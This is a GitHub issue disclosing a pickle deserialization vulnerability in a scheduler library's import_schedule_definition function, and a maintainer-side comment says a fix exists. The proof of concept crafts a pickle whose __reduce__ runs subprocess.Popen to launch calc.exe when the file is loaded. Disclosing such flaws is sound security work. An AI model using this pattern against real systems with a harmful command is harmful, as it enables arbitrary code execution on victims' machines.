Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

import_schedule_definition is vulnerable #19

Open
Joel-MalwareBenchmark opened this issue Jul 24, 2018 · 1 comment
Open

import_schedule_definition is vulnerable #19

Joel-MalwareBenchmark opened this issue Jul 24, 2018 · 1 comment

Comments

@Joel-MalwareBenchmark
Copy link

 from scheduler import io
 import os
 from pathlib import Path
 import pickle
 class joel_test(object):
     def __reduce__(self):
         import subprocess
         return (subprocess.Popen, ('calc.exe',))
 test = joel_test()
 f=open('solution\\scheduler.pickle','wb')
 pickle.dump(test,f)
 f.close()
 io.import_schedule_definition(Path(Path.cwd(), 'solution'))

Hi, there is a vulnerability in import_schedule_definition method in io.py, please see PoC above. It can execute arbitrary python commands resulting in command execution.

@huntr-helper
Copy link

‎‍🛠️ A fix has been provided for this issue. Please reference: 418sec#1

🔥 This fix has been provided through the https://huntr.dev/ bug bounty platform.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants